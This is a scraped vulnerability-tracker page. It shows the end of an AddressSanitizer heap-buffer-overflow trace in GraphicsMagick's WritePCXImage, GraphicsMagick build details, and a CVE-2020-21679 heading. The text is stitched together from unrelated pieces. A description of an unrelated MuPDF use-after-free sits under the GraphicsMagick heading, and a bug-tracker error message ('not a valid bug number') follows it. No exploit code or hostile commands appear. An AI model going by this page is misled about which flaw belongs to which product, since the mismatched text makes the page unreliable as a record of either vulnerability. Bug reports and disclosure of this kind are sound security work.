    #3 0x8eac18 in WriteImages /home/suhwan/project/graphicsmagick\-code/magick/constitute.c:2404:21

SUMMARY: AddressSanitizer: heap\-buffer\-overflow /home/suhwan/project/graphicsmagick\-code/coders/pcx.c:1255:17 in WritePCXImage
Shadow bytes around the buggy address:
  0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff8000: fa fa fd fd fd fd fa fa 00 00 00 fa fa fa 00 00
\=>0x0c067fff8010: 05 fa fa fa 00 00 00 00\[fa\]fa fa fa fa fa fa fa
  0x0c067fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
\==14178\==ABORTING

GraphicsMagick 1.4 snapshot-20191225 Q8 http://www.GraphicsMagick.org/  
Copyright (C) 2002-2019 GraphicsMagick Group.  
Additional copyrights and licenses apply to this software.  
See http://www.GraphicsMagick.org/www/Copyright.html for details.

Feature Support:  
Native Thread Safe yes  
Large Files (> 32 bit) yes  
Large Memory (> 32 bit) yes  
BZIP yes  
DPS no  
FlashPix no  
FreeType yes  
Ghostscript (Library) no  
JBIG yes  
JPEG-2000 no  
JPEG yes  
Little CMS yes  
Loadable Modules no  
Solaris mtmalloc no  
OpenMP yes (201107 "3.1")  
PNG yes  
TIFF yes  
TRIO no  
Solaris umem no  
WebP no  
WMF no  
X11 yes  
XML yes  
ZLIB yes

Host type: x86\_64-pc-linux-gnu

CVE-2020-21679: GraphicsMagick / Bugs / #619 heap-buffer-overflow in WritePCXImage

A Use After Free vulnerability in svg_dev_text_span_as_paths_defs function in source/fitz/svg-device.c in Artifex Software MuPDF 1.16.0 allows remote attackers to cause a denial of service via opening of a crafted PDF file.

'701294?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

Tag

#dos